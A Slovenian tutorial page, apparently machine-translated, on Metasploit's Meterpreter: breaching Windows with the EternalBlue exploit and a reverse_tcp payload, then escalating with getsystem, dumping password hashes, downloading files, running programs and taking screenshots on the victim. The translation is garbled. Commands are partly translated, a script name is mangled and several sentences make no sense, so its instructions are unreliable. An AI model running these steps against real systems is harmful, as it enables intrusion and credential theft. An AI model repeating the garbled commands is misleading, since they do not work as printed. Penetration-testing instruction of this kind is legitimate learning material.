metasploit

Naknadno izkoriščanje z Meterpreterjem

Naknadno izkoriščanje z Meterpreterjem
To je uvod v vtičnik za koristni tovor Meterpreter v Metasploitu. V tej kratki vadnici bomo razpravljali o tem, kako jo uporabiti za uporabo naknadnega izkoriščanja v sistemu OS WINDOWS, ko ste ga že kršili z uporabo Eternalblue exploit. Omejili se bomo na dostop do sistema Windows in njegovo raziskovanje, vse stvari, ki jih bomo naredili, pa se bodo osredotočale na dostop do informacij in uporabniških poverilnic.

Uvod v Meterpreter

Meterpreter je koristna obremenitev napada v okviru Metasploit, ki storilcu omogoča nadzor in krmarjenje po računalniku žrtve skozi ukazno lupino. Pri preizkušanju penetracije se lahko izkaže za zelo vsestransko orodje.  Je orodje po izkoriščanju, ki temelji na vbrizganju DLL v pomnilnik, kar pomeni, da vbrizgani DLL zažene z ustvarjanjem novega procesa, ki zahteva, da sistem zažene vbrizgan DLL. Omogoči vam lahko dostop do nevidne ukazne lupine na računalniku žrtve in vam omogoči zagon izvršljivih datotek in profilov omrežij.

Prvotno je bil napisan za Metasploit 2.x in je nadgrajen za Metasploit 3.

Podrobno bomo razpravljali o uporabi Meterpreterja, pred tem pa povejmo še besedo o nosilnosti na splošno

Kaj so tovori?

Nosilci v Metasploitu so moduli, kar pomeni, da so delčki kod v Metasploitu, ki se izvajajo v oddaljenem sistemu, na katerega ciljamo. Najprej se pošlje modul za izkoriščanje, ki v sistem namesti modul koristnega tovora. Nato koristni tovor omogoči napadalcu (omejen ali polnopravni, odvisno od vsebine koristnega tovora). Za nadaljnjo podrobnost o delovanju tovora moramo razpravljati o njegovih vrstah, ki jih je skupno 3:

Samski

Ti tovori so popolnoma samostojni, kar pomeni, da so lahko tako osnovni kot kode vratarjev, ki uporabnika pustijo v ciljni sistem.

Stagerji

Stagerji so koristni tovori, ki zbirajo aplikacije znotraj ciljnega sistema in jih pošljejo napadalcu. Vzpostavlja povezavo med žrtvijo in našim lokalnim strojem.

Obdobja

Ko imajo stopalci dostop do sistema, prenesejo module faz. Moduli stopnic odstranijo pokrov velikosti merilnika.

Primeri stopenj bi bili preprosta lupina, lupina iPhone 'ipwn', moduli Meterpreter, VNC Injection.

Tip koristnega tovora lahko ugotovite tako, da ugotovite njegovo ime. Posamezne nosilnosti so običajno take oblike /

Izkoriščanje z Meterpreterjem

Najprej zaženite konzolo msf tako, da v okno terminala Kali vnesete naslednji ukaz terminala.

$ sudo msfconsole

Kot stager uporabljamo reverse_tcp, kot oder pa Meterpreter.

Začeli bomo s postavitvijo Eternal Blue exploita. Izberite (ms17_010_eternalblue) in nato kot izbrani tovor nastavite windows / x64 / meterpreter / reverse_tcp

Nato konfigurirajte nastavitve izkoriščanja in nato z ukazom exploit zaženite exploit:

$ set koristni tovor windows / x64 / meterpreter / reverse_tcp
$ set rhost 192.168.198.136
$ izkoriščanje

The Eternalblue izkoriščanje je bil uspešno aktiviran.

Po izkoriščanju

Do že ogroženega sistema dostopamo in manipuliramo med njim po izkoriščanju.

Zdaj, ko imamo dostop do sistema, lahko počnemo veliko stvari, toda kot smo že omenili, moramo ostati osredotočeni predvsem na prenos informacij in pridobivanje uporabniških poverilnic tukaj

Upravljanje pravic dostopa:

Glede na modul koristnega tovora in izkoriščanje, ki ste ga uporabili, se boste morda soočili z določenimi omejitvami dostopa, ki bodo močno okrnile vaše sposobnosti manevriranja z žrtev. To težavo lahko rešite s stopnjevanjem privilegijev z brisanjem gesel in poseganjem v registre. Privilegije lahko stopnjujete tudi z Meterpreterjevim sistemskim ukazom get.

$ getsystem
$ getuid

Prenos datotek z Meterpreterjem

Z Meterpreterjem lahko datoteko prenesete z ukazom $ download-.

$ download / windows / system32 / drivers / etc / hosts

Podobno lahko podatke naložite tudi v napravo z ukazom $ upload-

Pridobivanje uporabniških poverilnic:

Za pridobivanje informacij o uporabniških računih uporabite kodni skript credential_collector ali za podoben učinek uporabite modul razprševanja hash.

Za nadaljevanje zbiranja poverilnic bomo uporabili modul hash dump post. Vnesite naslednji ukaz msf.

$ run post / windows / collect / hashdump

Kot lahko vidimo, smo dobili račune Coen, guest in admin. Hash LM (skrbniški) in NTLM (gostujoči) se nanašata na prazni gesli, medtem ko je razpršeni Coen geslo, ki ga boste morali razbiti. To lahko storite z uporabo brskalnika gesel.

Avtomatiziranje strganja sistema

Zbiranje informacij s posameznimi vhodnimi izjavami je lahko dolgočasno, da morate še naprej hraniti ukazno lupino. Prikladno lahko ta postopek nekoliko avtomatizirate z vinsko pisavo. Skript zbira informacije od žrtve in jih prenaša v naš lokalni računalnik. Povedali boste, kje se shranjujejo izhodi, kot lahko vidite v četrti vrstici od zgoraj:

$ run wineum

Upoštevajte, da se pot, kjer je shranjen izhod za vsak ukaz, morda razlikuje od prikazane tukaj.

Naj se še malo zafrkava

Izvajanje datotek

V sistemu lahko zaženete katero koli datoteko z uporabo: execute -f . Sem spadajo izvršljive datoteke in programi z več podpornimi datotekami. Če želite na primer v operacijskem sistemu Windows OS zagnati vgrajeno aplikacijo kalkulatorja, vnesite execute -f calc.exe

Posnetek zaslona

Posnetke zaslona lahko posnamete tudi z vidika uporabnika. Preprosto vnesite posnetek zaslona v ukazno lupino Meterpreterja in v sistemu boste dobili posnetek zaslona.

$ execute -f calc.exe
$ posnetek zaslona

Zaključek:

To je bil kratek uvod v vtičnik Meterpreter v okviru Metasploit, skupaj s kratkim vodnikom, ki prikazuje njegovo najosnovnejšo uporabo. Tu smo se naučili, kako lahko z uporabo Eternalblue exploit pridobimo dostop do sistema Windows OS, nato z Meterpreterjem stopnjujemo privilegije, ročno zbiramo informacije in z avtomatizirajočim ukazom vineus. Naučili smo se tudi, kako izvajati datoteke na računalniku žrtve.

Meterpreter lahko služi kot pomembno sredstvo za odkrivanje ranljivosti, čeprav je skupek osnovnih orodij v okviru Metasploita.

HD Remastered Games za Linux, ki prej še niso izdale Linuxa
Mnogi razvijalci iger in založniki pripravijo HD remaster starih iger, da podaljšajo življenjsko dobo franšize, zato oboževalci zahtevajo združljivost...
Kako uporabljati AutoKey za avtomatizacijo iger Linux
AutoKey je namizni pripomoček za avtomatizacijo za Linux in X11, programiran v Python 3, GTK in Qt. Z njegovo funkcijo skriptiranja in MACRO lahko avt...
Kako prikazati števec FPS v igrah Linux
Linux gaming je dobil velik zagon, ko je Valve leta 2012 napovedal podporo Linuxu za odjemalca Steam in njihove igre. Od takrat se je veliko AAA in in...